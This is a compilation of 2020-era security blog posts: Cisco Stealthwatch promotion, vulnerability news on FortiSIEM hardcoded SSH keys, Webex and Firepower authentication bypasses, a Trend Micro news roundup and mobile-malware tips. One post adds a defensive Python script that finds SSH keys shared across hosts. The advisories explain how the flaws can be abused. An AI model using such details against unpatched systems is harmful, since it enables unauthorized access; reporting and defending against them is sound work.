
Time for Some Straight Talk Around Network Traffic Analysis

According to research from the Enterprise Strategy Group, 87% of organizations use Network Traffic Analysis (NTA) tools for threat detection and response today, and 43% say that NTA is a “first line of defense” in case of an attack. Increasing IT complexity is one of the main factors driving the adoption of NTA tools: growing infrastructure, the rise of hybrid and multi-cloud deployments, employees accessing the network from any device and any location, and a large number of smart devices (IoT/OT) connecting to the network. At the same time, the attack landscape has evolved as well: the use of stolen credentials, threats hiding in encrypted traffic, the rise in nation-state attacks, and more.

Perhaps that’s why there are so many NTA vendors out there today, trying to catch the attention of security practitioners, carrying their “AI and ML” billboards.

Cisco offers an NTA solution as well, but it wasn’t born yesterday. Cisco Stealthwatch has been in the market for more than 17 years. Here are some things that make it the market-leading NTA solution:

Broad dataset

Stealthwatch has always relied on network metadata such as NetFlow to feed its analytics. Now, some vendors claim that this way of ingesting telemetry doesn’t give the complete picture and has limitations. That is because they rely on deploying a large number of sensors and probes in the network to capture data. If I were cynical, I’d say the vendors who take this position want you to buy more probes and increase your workload!

We realized very early on that as the network grows exponentially, it’s very difficult (and expensive) to deploy sensors everywhere, and this approach leaves you with a lot of blind spots. That’s why we offer customers an agentless deployment using built-in functionality in your network devices. And unlike competitive claims, Stealthwatch doesn’t just rely on NetFlow. For example, it gets user contextual data from Cisco Identity Services Engine (ISE) and also ingests proxy, web, and endpoint data to provide comprehensive visibility. If you do need to investigate the payload, Stealthwatch integrates with major packet capture solutions so you can selectively analyze the malicious traffic pinpointed by Stealthwatch.

Layered analytical approach

Visibility is great, but can be dangerous when it begins to overwhelm your security team. The key is effective analytics to reduce that massive dataset to a few actionable alerts. Stealthwatch uses close to 100 different behavioral models to analyze the telemetry and identify anomalies. These anomalies are further reduced to high-level alerts mapped to the kill-chain such as reconnaissance, command-and-control, data exfiltration and others. Stealthwatch also employs machine learning that uses global threat intelligence powered by Cisco Talos and techniques like supervised and unsupervised learning, statistical modeling, rule mining…I could go on. But I want to talk about the outcomes of analytics within the solution:

  • Stealthwatch processes ~6.7 trillion network sessions each day across ~80 million devices in our customer environments and reduces them to a few critical alerts. In fact, our customers consistently rate more than 90% of the alerts they see in the dashboard as helpful.
  • Stealthwatch can automatically detect and classify devices and their roles on the network, so that your security scales automatically with your growing network.
  • Another key outcome of Stealthwatch security analytics is the ability to analyze encrypted traffic to detect threats and ensure compliance, without any decryption, using Encrypted Traffic Analytics. With greater than 80% of web traffic being encrypted [1] and more than 70% of threats in 2020 predicted to use encryption [2], this is a major attack vector and it’s no longer feasible to rely on decryption-based monitoring.
  • And lastly, instead of throwing out random metrics like “XX times workload reduction”, we asked our customers how Stealthwatch has helped them in their incident response, and 77% agreed that it has reduced the time to detect and remediate threats from months to hours.

Multi-cloud visibility

As organizations increasingly adopt the cloud, they need to ensure that their security controls extend to the cloud as well. Stealthwatch is the only network traffic analysis solution that can provide truly cloud-native visibility across all major cloud providers like Amazon Web Services (AWS), Microsoft Azure and Google Cloud Platform (GCP). And again, the deployment is agentless without the need to install multiple sensors across the infrastructure. With a single solution, you get visibility across the entire network infrastructure, on-premises to the cloud.

Integrated platform approach

We have been working on integrating Stealthwatch analytics into our security platform that spans the network, endpoints, applications and cloud. Most recently, we have integrated Stealthwatch with Cisco Threat Response. Stealthwatch sends alerts directly to Cisco Threat Response’s Incident Manager feature, allowing users to see those alerts alongside prioritized security alerts from other products such as Firepower devices. These incidents can then be investigated with additional context from your other Threat Response-enabled technologies, all in one console, with one click. This lowers the time required to triage and respond to these alarms.

Stealthwatch is also integrated with Cisco firewalls through the Cisco Defense Orchestrator for threat detection and effective policy management.

Try Stealthwatch

Customers, big and small, love and trust Stealthwatch. We count 15 of top 20 US banks, and 14 of top 20 global healthcare companies among our customers. If you would like to try the solution, you can sign up for a free 2-week Stealthwatch visibility assessment at: https://www.cisco.com/go/free-visibility-assessment

Joining us at Cisco Live, Barcelona this week? Here’s a guide to all the activities and key sessions related to Stealthwatch at the event or come check out a Stealthwatch demo within the Security area at World of Solutions.

  1. As of May 2019, 94% of all Google web traffic is encrypted. And nearly 80% of web pages loaded by Firefox use HTTPS
  2. Gartner predicts that more than 70% of malware campaigns in 2020 will use some type of encryption to conceal malware delivery, command-and-control activity, or data exfiltration – Gartner, Predicts 2017: Network and Gateway Security, December 13, 2016

The post Time for Some Straight Talk Around Network Traffic Analysis appeared first on Cisco Blogs.

5 Ways Your Organization Can Ensure Improved Data Security

Each year on January 28, the United States, Canada, Israel and 47 European countries observe Data Privacy Day. The purpose of Data Privacy Day is to inspire dialogue on the importance of online privacy. These discussions also seek to inspire individuals and businesses to take action in an effort to respect privacy, safeguard data and […]

The post 5 Ways Your Organization Can Ensure Improved Data Security appeared first on The State of Security.

Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM

The vendor Fortinet has finally released security patches to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Fortinet has finally released security updates to remove the hardcoded SSH keys in Fortinet SIEM appliances.

Recently, Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management product, FortiSIEM, that can be used by attackers to access the FortiSIEM Supervisor.

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser’, and it is stored in plain text.

“FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a condition of denial of service. 

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser’ only runs in a restricted shell that lets only that user create tunnel connections from the supervisor to the originating IP.

On January 15, Fortinet released a patch that removed the hardcoded public key in FortiSIEM.

Fortinet urges customers to install the patch for CVE-2019-17659, or to restrict access to FortiSIEM’s “tunneluser” port (19999). Users should upgrade to FortiSIEM version 5.2.7 or above.

Fortinet also addressed another issue in Fortinet’s FortiSIEM, tracked as CVE-2019-16153, that is related to the presence of a hardcoded password in the FortiSIEM database component. The flaw could be exploited by attackers to access the device database via the use of static credentials.

“A hard-coded password vulnerability in the FortiSIEM database component may allow attackers to access the device database via the use of static credentials.” reads the advisory published by Fortinet.

The issue affects FortiSIEM 5.2.5 and below; it can be addressed by upgrading systems to FortiSIEM 5.2.6 or above.

The issue was reported to Fortinet by the independent security researcher Srour Ganoush, “CERT CYBERPROTECT” and “Chris Armstrong from CSCI, Inc.”

Pierluigi Paganini

(SecurityAffairs – Fortinet, hacking)

The post Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM appeared first on Security Affairs.

Cloudy with a Chance of Extremely High Alert Accuracy

You can tell it’s raining by sticking your head out the door; but what’s the likelihood of it stopping in the next hour? What’s the temperature and relative humidity? Suddenly the need for analytics is apparent. Without it, the chance of getting soaked on any given day would dramatically increase.

Analytics makes the world go ‘round. So why shouldn’t it be the same in security? According to our CISO Benchmark Study, only 35% of respondents said it was easy to determine the scope of a compromise, contain it, and remediate it. This is where analytics can come in, helping to turn the tide. Analytics are becoming increasingly critical for security, and when done right, can significantly improve an organization’s risk posture.

With so much at stake, cybersecurity should be seamless, precise, and manageable. Unfortunately, as I elaborated on in my last blog post, that’s not often the case. Organizations have become accustomed to purchasing and using too many security products without having enough people to manage them – resulting in more alerts than can be digested.

Forecast: Advanced Analytics

We understand the importance of delivering security intelligence that can be easily obtained, understood, and responded to in a timely manner. Seventy-seven percent of our customers say that our industry-leading Network Traffic Analysis (NTA) solution, Cisco Stealthwatch, has reduced their time to detect and remediate threats from months to hours, and has provided a fast return on investment.

Stealthwatch provides enterprise-wide visibility from the private network to the public cloud – including from endpoints and encrypted traffic. It delivers comprehensive situational awareness to help organizations detect, prioritize, and mitigate threats in real time.

Customers Enhance Security with Stealthwatch

The in-depth visibility and robust analytics provided by Stealthwatch translate into high-fidelity alerts, dramatically decreasing the need to manually sift through massive amounts of information to pinpoint a security threat. In fact, our customers consistently rate greater than 90 percent of the alerts they receive from Stealthwatch as “helpful,” meaning they lead to something that definitely needs attention. Minimizing noise and zeroing in on what’s most important is a requirement for effectively protecting today’s complex, modernized environments.

  • According to the Durham County Government, Stealthwatch has increased visibility and detection of internal threats by at least 80% and has reduced incident response time by 90%.
  • According to Dimension Data, Stealthwatch has decreased incident response time by over 100 days.
  • And with Stealthwatch, J. Crew Group can now respond to incidents in 10-15 minutes.

A Platform Approach to Security

Stealthwatch is part of a portfolio of products that work together as a team, learning from each other and improving each other’s effectiveness. For example, Stealthwatch integrates with our incident response portal, Cisco Threat Response, and our security policy management tool, Cisco Defense Orchestrator. We also integrate third-party solutions to deliver more thorough and impactful defenses.

Stealthwatch leverages many aspects of our platform approach to security – including integration, automation, and machine learning – to harden networks and simplify protection. It’s like knowing with confidence what the weather will be like all day and having exactly the right kind of clothes to stay comfortable and dry.

Learn More

If you are joining us this week at Cisco Live in Barcelona, come check out Stealthwatch at one of the sessions or experience a demo within the Security area at the World of Solutions. Or, learn more about Stealthwatch here and take our free 2-week visibility assessment to see how powerful security analytics can quickly surface threats that might be lurking within your network.

The post Cloudy with a Chance of Extremely High Alert Accuracy appeared first on Cisco Blogs.

From Privacy to Trust and ROI

As we embark on a new decade, data privacy has become top-of-mind for business executives and consumers worldwide. Data breaches frequently expose the personal data of millions, and many companies have not done enough to protect themselves from intentional or unintentional misuse. While it is often hard to reach agreement on new legislation, one issue that governments around the world seem to agree on is the need to help protect the personal data of their constituents. The EU’s General Data Protection Regulation (GDPR) became enforceable in May 2018, and many countries, from China to Brazil, have updated or passed their own regulations. The new California Consumer Privacy Act (CCPA) became effective at the beginning of 2020, other states are following suit, and a U.S. Federal privacy law is now under consideration.

Insights from the Cisco Data Privacy Research Program

The Cisco Chief Privacy Office has provided groundbreaking research and insights to help organizations and consumers understand what they can and should do to keep data safe and maximize their investments in data privacy. Two years ago, we launched our Data Privacy Benchmark Study, which explored privacy maturity and investments across thousands of organizations worldwide. We found that two-thirds of organizations were experiencing significant sales delays due to customers’ data privacy concerns, but that privacy investment was minimizing those delays. Last year, we expanded our inquiry to explore a wide range of business benefits, including the connection between privacy investment and security benefits such as fewer and less costly breaches. In November, we released a companion study looking at the attitudes and behaviors of consumers worldwide. We identified a large group we call “Privacy Actives”: consumers who care about privacy, are willing to spend time or money to protect their data, and have already switched companies or providers based on their data policies.

The 2020 Data Privacy Benchmark Study and the ROI of Privacy

Today, in observance of International Data Privacy Day, I am pleased to share our 2020 Data Privacy Benchmark Study. Drawing on data from 2800 organizations in 13 countries, we have – for the first time – calculated the ROI for privacy. In addition, we updated the privacy metrics we have been tracking over several years. The study explores the value of privacy certifications in today’s market, as follows:

  • For every dollar spent on privacy, the average organization is getting $2.70 in associated benefits. We asked respondents to quantify their annual privacy investment and business benefits, and we used this to calculate their privacy ROI. Most organizations are seeing very positive returns, and over 40% are realizing at least double their investment.
  • 70% of organizations say they received significant business benefits from privacy beyond compliance. This is up from 40% last year, and includes better agility and innovation, increased competitive advantage, improved attractiveness to investors, and greater customer trust.
  • Higher accountability translates to increased benefits: Companies with higher accountability scores (as assessed using the Accountability Wheel of the Centre for Information Policy Leadership) experience lower breach costs, shorter sales delays, and higher financial returns.
  • Eighty-two percent of organizations see privacy certifications as a motivation for purchasing: Privacy certifications such as the ISO 27701 and the EU-U.S. Privacy Shield are becoming an important purchasing factor when selecting a third-party vendor.

What does this mean for organizations?

The results of this study highlight that privacy is good for business, beyond any compliance requirements. We recommend that organizations:

  • Invest in privacy beyond the legal minimum; most organizations are seeing very positive returns on their privacy spending.
  • Work to obtain external privacy certifications; these have become an important factor in the buying process.
  • Build in privacy accountability and maturity to achieve security benefits, reduced sales delays, and higher returns.

In future blogs, I will explore these results more fully, including some of the interesting differences in results across geographies and company size.

More Information

Cisco Data Privacy Benchmark Study 2020

Press Announcement Cisco Data Privacy Benchmark Study 2020 Confirms Positive Financial Benefits of Strong Corporate Data Privacy Practices

Cisco Data Privacy Benchmark Study 2020 – Infographic

Cisco 2019 Data Privacy Benchmark Study

Consumer Privacy Survey

Cisco Data Privacy

Follow Robert on Twitter @RobertWaitman


The post From Privacy to Trust and ROI appeared first on Cisco Blogs.

Cisco Webex flaw allows unauthenticated remote attackers to join private meetings

Cisco addressed a vulnerability in Cisco Webex that could be exploited by a remote, unauthenticated attacker to join a protected video conference meeting.

Cisco has addressed a high-severity flaw in the Cisco Webex video conferencing platform (CVE-2020-3142) that could be exploited by a remote, unauthenticated attacker to enter a password-protected video conference meeting.

In order to exploit the CVE-2020-3142 flaw, the attacker only needs to know the meeting ID; once it is entered in the Webex mobile application for either iOS or Android, it allows them to join the meeting, bypassing any authentication.

“A vulnerability in Cisco Webex Meetings Suite sites and Webex Meetings Online sites could allow an unauthenticated, remote attendee to join a password-protected meeting without providing the meeting password. The connection attempt must initiate from a Webex mobile application for either iOS or Android.” reads the security advisory published by Cisco. “An unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device’s web browser.”

The CVE-2020-3142 vulnerability received a CVSS score of 7.5 out of 10; it was discovered by Cisco’s experts while they were resolving a Cisco TAC support case.

Fortunately, the presence of the attackers in the meeting is easy to detect because the unauthorized attendees would be visible in the attendee list of the meeting as a mobile attendee.

The vulnerability affects Cisco Webex Meetings Suite sites and Cisco Meetings Online sites for versions earlier than 39.11.5 (for the former) and 40.1.3 (for the latter).

Cisco addressed the CVE-2020-3142 vulnerability with the release of the versions 39.11.5 and later and 40.1.3 and later for Webex Meetings Suite sites and Webex Meetings Online sites.

The good news is that the Cisco Product Security Incident Response Team (PSIRT) is not aware of any attack exploiting the vulnerability in the wild.

A couple of weeks ago, Cisco Systems released security fixes for two high-severity vulnerabilities in its products, including a remote code execution flaw in the Webex video conferencing platform.

The Webex flaw addressed by Cisco resides in the web-based management interface of Webex Video Mesh, a feature that enables on-premises infrastructure for video conferencing.

This flaw affects Webex Video Mesh Software releases earlier than 2019.09.19.1956m.

Pierluigi Paganini

(SecurityAffairs – Webex, hacking)

The post Cisco Webex flaw allows unauthenticated remote attackers to join private meetings appeared first on Security Affairs.

This Week in Security News: Trend Micro Creates Factory Honeypot to Trap Malicious Attackers and Microsoft Leaves 250M Customer Service Records Open to the Web

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, dive into a research study that explores the risks associated with common cybersecurity vulnerabilities in a factory setting. Also, read about how misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records.

Read on:

Don’t Let the Vulnera-Bullies Win. Use Our Free Tool to See If You Are Patched Against Vulnerability CVE-2020-0601

Last week, Microsoft announced vulnerability CVE-2020-0601 and has already released a patch to protect against any exploits stemming from the vulnerability. Understanding how difficult it can be to patch systems in a timely manner, Trend Micro created a valuable tool that will test endpoints to determine if they have been patched against this latest threat or if they are still vulnerable.

Ransomware, Snooping and Attempted Shutdowns: See What Hackers Did to These Systems Left Unprotected Online

Malicious hackers are targeting factories and industrial environments with a wide variety of malware and cyberattacks including ransomware and cryptocurrency miners. All of these incidents were spotted by researchers at Trend Micro who built a honeypot that mimicked the environment of a real factory. The fake factory featured some common cybersecurity vulnerabilities to make it appealing for hackers to discover and target.

Defend Yourself Now and In the Future Against Mobile Malware

Recently, 42 apps were removed from the Google Play Store after being installed eight million times over the period of a year, flooding victims’ screens with unwanted advertising. Trend Micro blocked more than 86 million mobile threats in 2018, and that number is expected to continue to increase. To learn how to protect your mobile device from hackers, read this blog from Trend Micro.

Trend Micro Joins LOT Network to Fight ‘Patent Trolls’

Trend Micro announced this week that it has joined non-profit community LOT Network in a bid to combat the growing threat posed to its business and its customers by patent assertion entities (PAEs). The community now has more than 500 members, including some of the world’s biggest tech companies such as Amazon, Facebook, Google, Microsoft and Cisco.

Blocking A CurveBall: PoCs Out for Critical Microsoft-NSA Bug CVE-2020-0601

Security researchers have released proof-of-concept (PoC) codes for exploiting CVE-2020-0601, a bug that the National Security Agency (NSA) reported. The vulnerability affects Windows operating systems’ CryptoAPI’s validation of Elliptic Curve Cryptography (ECC) certificates and Public Key Infrastructure (PKI) trust. Enterprises and users are advised to patch their systems immediately to prevent attacks that exploit this security flaw.

Microsoft Leaves 250M Customer Service Records Open to the Web

Misconfigured Microsoft cloud databases containing 14 years of customer support logs exposed 250 million records to the open internet for 25 days. The account information dates back as far as 2005 and as recent as December 2019 and exposes Microsoft customers to phishing and tech scams. Microsoft said it is in the process of notifying affected customers.

Microsoft Releases Advisory on Zero-Day Vulnerability CVE-2020-0674, Workaround Provided

On January 17, Microsoft published an advisory (ADV200001) warning users about CVE-2020-0674, a remote code execution (RCE) vulnerability involving Microsoft’s Internet Explorer (IE) web browser. A patch has not yet been released as of the time of writing — however, Microsoft has acknowledged that it is aware of limited targeted attacks exploiting the flaw.

Google to Apple: Safari’s Privacy Feature Actually Opens iPhone Users to Tracking

Researchers from Google’s Information Security Engineering team have detailed several security issues in the design of Apple’s Safari anti-tracking system, Intelligent Tracking Prevention (ITP). ITP is designed to restrict cookies and is Apple’s answer to online marketers that track users across websites. However, Google researchers argue in a new paper that ITP leaks Safari users’ web browsing habits.

Hacker Publishes Credentials for Over 515,000 Servers, Routers, and IoT Devices

A hacker has published the credentials of over 515,000 servers, routers, and IoT devices on a well-known hacking website. ZDNet reported that the list consists of IP addresses and the usernames and passwords used by each for unlocking Telnet services, the port that allows these devices to be controlled through the internet.

Pwn2Own Miami Contestants Haul in $180K for Hacking ICS Equipment

The first Pwn2Own hacking competition that exclusively focuses on industrial control systems (ICS) has kicked off in Miami. So far, a total of $180,000 has been awarded for pwning five different products. The contest hosts at Trend Micro’s Zero Day initiative (ZDI) have allocated more than $250,000 in cash and prizes for the contest, which is testing eight targets across five categories.

Sextortion Scheme Claims Use of Home Cameras, Demands Bitcoin or Gift Card Payment

A new sextortion scheme has been found preying on victims’ fears through social engineering and follows in the footsteps of recent sextortion schemes demanding payment in bitcoin. Security researchers at Mimecast observed the scheme during the first week of the year. The scheme reportedly sent a total of 1,687 emails on Jan. 2 and 3, mostly to U.S. email account holders.

NetWire RAT Hidden in IMG Files Deployed in BEC Campaign

A recent business email compromise (BEC) campaign, purportedly coming from a small number of scammers in Germany, targets organizations by sending them emails with IMG file attachments hiding a NetWire remote access trojan (RAT). The campaign was discovered by IBM X-Force security researchers and involves sending an employee of the targeted organization an email masquerading as a corporate request.

What are your thoughts on the results of Trend Micro’s factory honeypot study? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


Ako Ransomware targeting businesses using RaaS

Quick Heal security researchers recently observed ransomware that uses RaaS (Ransomware as a Service), which is a subpart of MaaS (Malware as a Service). Before delving into the AKO ransomware or RaaS, one must understand what Malware as a Service means, as it is…

Cisco fixes critical issue in Cisco Firepower Management Center

Cisco addressed a critical issue in the Cisco Firepower Management Center (FMC) that could allow a remote attacker to bypass authentication and execute arbitrary actions.

Cisco fixed a critical vulnerability in the Cisco Firepower Management Center that could allow a remote attacker to gain administrative access to the web-based management interface of the vulnerable devices and execute arbitrary actions. The vulnerability, tracked as CVE-2019-16028, received a CVSS score of 9.8.

“A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the security advisory published by Cisco.

“The vulnerability is due to improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to gain administrative access to the web-based management interface of the affected device.”

According to Cisco, the issue stems from the improper handling of Lightweight Directory Access Protocol (LDAP) authentication responses from an external server. It could be triggered by sending crafted HTTP requests to a vulnerable device in order to gain administrative access to the web-based management interface.

Cisco warns that only Cisco Firepower Management Center devices configured to authenticate users of the web-based management interface through an external LDAP server are affected.

“To determine whether external authentication using an LDAP server is configured on the device, administrators can navigate to System > Users > External Authentication and look for an External Authentication Object that uses LDAP as the authentication method. The External Authentication Object must be enabled for the FMC to be affected.” continues the advisory.

Cisco released FMC Software versions 6.4.0.7 and 6.5.0.2 to address the flaw; it also announced the release of patches for versions 6.2.3 (6.2.3.16) and 6.3.0 (6.3.0.6) in February and May 2020, respectively.

The company confirmed that there are no workarounds that address this vulnerability; it also confirmed that this issue does not affect Cisco Adaptive Security Appliance (ASA) Software or Cisco Firepower Threat Defense (FTD) Software.

Cisco is not aware of any attack in the wild exploiting the flaw.

Pierluigi Paganini

(SecurityAffairs – Iran, hacking)

The post Cisco fixes critical issue in Cisco Firepower Management Center appeared first on Security Affairs.

Expert found a hardcoded SSH Key in Fortinet SIEM appliances

An expert found a hardcoded SSH public key in Fortinet’s Security Information and Event Management product, FortiSIEM, that can allow access to the FortiSIEM Supervisor.

Andrew Klaus, a security specialist from Cybera, discovered a hardcoded SSH public key in Fortinet’s Security Information and Event Management product, FortiSIEM, that can be used by attackers to access the FortiSIEM Supervisor.

The expert discovered that the Fortinet devices share the same SSH key for the user ‘tunneluser’, and it is stored in plain text.

“FortiSIEM has a hardcoded SSH public key for user “tunneluser” which is the same between all installs. An attacker with this key can successfully authenticate as this user to the FortiSIEM Supervisor.” reads the security advisory. “The unencrypted key is also stored inside the FortiSIEM image. While the user’s shell is limited to running the /opt/phoenix/phscripts/bin/tunnelshell script, SSH authentication still succeeds.”

Fortinet published a security advisory for the issue that is tracked as CVE-2019-17659.

The vulnerability could be exploited by attackers to trigger a denial of service condition.

“A use of hard-coded cryptographic key vulnerability in FortiSIEM may allow a remote unauthenticated attacker to obtain SSH access to the supervisor as the restricted user “tunneluser” by leveraging knowledge of the private key from another installation or a firmware image.” reads the advisory.

The user ‘tunneluser’ only runs in a restricted shell that lets that user do nothing but create tunnel connections from the supervisor back to the originating IP.

The feature was implemented to enable connecting to collectors from the supervisor when there is a firewall between the collector and the supervisor.

Fortinet invites customers that are not using the reverse tunnel feature to disable SSH on port 19999, which only allows tunneluser to authenticate. Fortinet also advises customers to disable “tunneluser” SSH access on port 22.

Below is the timeline of the vulnerability:

  • Dec 2, 2019: Email sent to Fortinet PSIRT with vulnerability details.
  • Dec 3, 2019: Automated reply from PSIRT that email was received.
  • Dec 23, 2019: Sent a reminder email to PSIRT about requesting a human confirmation.
  • Jan 3, 2019: Public Release.

The flaw affects FortiSIEM version 5.2.6 and below; the tech firm addressed it with the release of FortiSIEM version 5.2.7.
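The defensive check that follows from this advisory is whether any account on your own appliances is authorized with a key that is identical across installs. The script below is an added example, not Fortinet's or the researcher's code: it fingerprints every `authorized_keys` entry in a fleet inventory (OpenSSH's `SHA256:` format) and reports keys that are accepted on more than one host. The host names, the `no-pty` option and the ed25519 key blobs are all constructed for the example; the blobs are structurally valid wire-format keys but not real keys.

```python
import base64
import hashlib
import struct
from collections import defaultdict

# Key types that may appear in authorized_keys; an options prefix may precede them.
KEY_TYPES = {
    "ssh-rsa", "ssh-ed25519", "ssh-dss",
    "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
}


def openssh_fingerprint(b64_key: str) -> str:
    """Return the OpenSSH-style SHA256 fingerprint of a base64 public key blob."""
    raw = base64.b64decode(b64_key)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_authorized_keys(text: str):
    """Yield (key_type, b64_key, comment) per key line, skipping blanks, comments and options."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # An entry may start with options such as 'no-pty'; locate the key type token.
        idx = next((i for i, f in enumerate(fields) if f in KEY_TYPES), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        yield fields[idx], fields[idx + 1], " ".join(fields[idx + 2:])


def find_shared_keys(inventory: dict) -> dict:
    """inventory is {host: {user: authorized_keys_text}}.

    Returns {fingerprint: [(host, user), ...]} for every key accepted on more than
    one host, which is the pattern described for the FortiSIEM 'tunneluser' account.
    """
    seen = defaultdict(list)
    for host, users in inventory.items():
        for user, text in users.items():
            for _ktype, b64_key, _comment in parse_authorized_keys(text):
                seen[openssh_fingerprint(b64_key)].append((host, user))
    return {fp: locs for fp, locs in seen.items()
            if len({host for host, _ in locs}) > 1}


def _fake_ed25519_blob(seed: int) -> str:
    """Constructed ssh-ed25519 wire blob (string 'ssh-ed25519' + 32 key bytes); not a real key."""
    pub = bytes([seed]) * 32
    blob = struct.pack(">I", 11) + b"ssh-ed25519" + struct.pack(">I", 32) + pub
    return base64.b64encode(blob).decode("ascii")


SHARED_KEY = _fake_ed25519_blob(0x41)
UNIQUE_KEY = _fake_ed25519_blob(0x42)

# Constructed inventory: three appliances whose 'tunneluser' shares one key,
# plus one admin key that is present on a single host only.
SAMPLE_INVENTORY = {
    "siem-a": {"tunneluser": f"ssh-ed25519 {SHARED_KEY} tunneluser@siem\n",
               "admin": f"ssh-ed25519 {UNIQUE_KEY} ops@laptop\n"},
    "siem-b": {"tunneluser": f"no-pty,no-X11-forwarding ssh-ed25519 {SHARED_KEY} tunneluser@siem\n"},
    "siem-c": {"tunneluser": f"# managed entry\nssh-ed25519 {SHARED_KEY}\n"},
}

if __name__ == "__main__":
    for fp, locs in find_shared_keys(SAMPLE_INVENTORY).items():
        print(fp, "is authorized on", sorted(locs))
```

A key that shows up on every host is not proof of a vendor-baked credential (it may be your own deployment key), but it is exactly the condition the advisory describes, and the fingerprint lets you compare against the appliance image without handling the key material itself.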

Pierluigi Paganini

(SecurityAffairs – FortiSIEM, hacking)

The post Expert found a hardcoded SSH Key in Fortinet SIEM appliances appeared first on Security Affairs.

Defend Yourself Now and in the Future Against Mobile Malware

The world has gone mobile and the US is leading the way. It’s estimated that the number of smartphone users alone topped 257 million in the States in 2018. That means three-quarters (74%) of households now boast at least one mobile device. And in this new digital world, it’s mobile applications that really matter. They’re a one-click gateway to our favorite videos, live messaging, email, banking, social media and much more.

There are said to be around 2.8 million of these apps on the official Google Play Store today. But unfortunately, where there are users, there are also hackers looking to capitalize. And one of their favorite ways to make money is by tricking you into downloading a malicious app they’ve sneaked onto the marketplace.

Most recently, 42 such apps had to be removed after being installed eight million times over the period of a year, flooding victims’ screens with unwanted advertising. This is just the tip of the iceberg. As more of us turn to mobile devices as our primary internet gateway, the bad guys will follow suit. Trend Micro blocked over 86 million mobile threats in 2018, and we can expect this figure to increase into the future.

So how can you protect your devices and your data from hackers?

Adware ahoy

The latest bunch of 42 apps are from a class of malicious software known as adware. This follows a previous discovery by Trend Micro earlier this year of a further 85 adware-laden apps downloaded eight million times. Cyber-criminals fraudulently make money by displaying unwanted ads on the victim’s device. In the meantime, the user has to contend with annoying pop-ups which can run down the device’s battery and eat up computing resources. Some even silently gather user information.

Ones to watch

Unfortunately, it’s increasingly difficult to spot malicious apps on the Play Store. A popular tactic for hackers is to hide their malware in titles which impersonate legitimate applications. A recent two-year study found thousands of such counterfeits on the Play Store, exposing users unwittingly to malware. Banking apps are a particularly popular type of title to impersonate as they can provide hackers with highly lucrative log-ins to open users’ accounts.

Some malware, like the recently disclosed Agent Smith threat, works by replacing all the legitimate apps on a user’s device with malicious alter-egos.

So, as we hit 2020, what other threats hidden in legitimate-seeming apps should mobile users be looking out for?

  • More intrusive adware.
  • Cryptocurrency mining malware. This will run in the background, eating up your device battery and computing power. Trend Micro noted a 450% increase in infections from 2017 to 2018.
  • Banking Trojans designed to harvest your log-ins so hackers can get their hands on your savings. Our detections of this malware soared 98% between 2017-18.
  • Ransomware. These attacks have evolved from simple screen lockers to malware designed to encrypt all the files on your device.
  • Premium rate services. Some malware will covertly text or call premium rate SMS numbers under the control of the hacker, thus making them money and costing you potentially significant sums. ExpensiveWall malware, for example, was found in 50 Google Play apps and downloaded millions of times, charging victims’ accounts for fake services.
  • Information theft. Some malware will allow hackers to eavesdrop on your conversations, and/or hoover up your personal data, including phone number, email address, and account log-ins. This data can then be sold on the dark web and used in follow-on identity fraud attempts.

Is Google helping?

The Android ecosystem has always been, and remains, a bigger threat than iOS because it’s relatively easier for developers to get their applications onto the official marketplace. Now, it’s true that Google carries out some vetting of the apps on its Play Store, and it is getting better and quicker at spotting and blocking malware. It says the number of rejected app submissions grew by over 55% in 2018, while app suspensions increased by over 66%.

However, Google’s Play Protect, which is pre-installed on Android devices, has garnered less than favorable reviews. This anti-malware solution is intended to scan for malicious apps to prevent you from downloading them, but it has been criticized for its “terrible malware protection.”

In fact, in independent tests run in July by German organization AV-TEST, Google Play Protect found just 44% of the 3,347 “real-time” online malware threats, and just 55% of the 3,433 malware samples that were collected in the previous month. According to Tom’s Guide, “these scores are all well below the industry averages, which were always 99.5% or above in both categories for all three rounds.”

How do I stay safe?

So how can mobile users ensure their personal data and devices are secure from the growing range of app-based threats?

Consider the following:

  • Only visit official app stores. Even though Google Play has a malware problem, it is more secure than third-party app stores. In fact, you are 23 times more likely to install a potentially harmful application (PHA) outside Play, according to Google.
  • Ensure you’re on the latest operating system version.
  • Do not root your device as this can expose it to threats.
  • Be cautious. If the app is requesting an excessive number of permissions, it may be malicious.
  • Install on-device AV from a reputable third-party provider like Trend Micro.

How Trend Micro Mobile Security helps

Trend Micro Mobile Security (TMMS) offers customers comprehensive anti-malware capabilities via its real-time Security Scan function. Security Scan alerts you to any malware hidden in apps before they are installed and suggests legitimate versions. It can also be manually run on devices to detect and remove malicious apps, including ransomware, that may already have been installed.

To use the manual scan, simply:

1. Tap the Security Scan panel in the TMMS Console. The Security Scan settings screen appears, with the Settings tab active by default.

2. Tap Scan Now to conduct a security scan. The result appears.

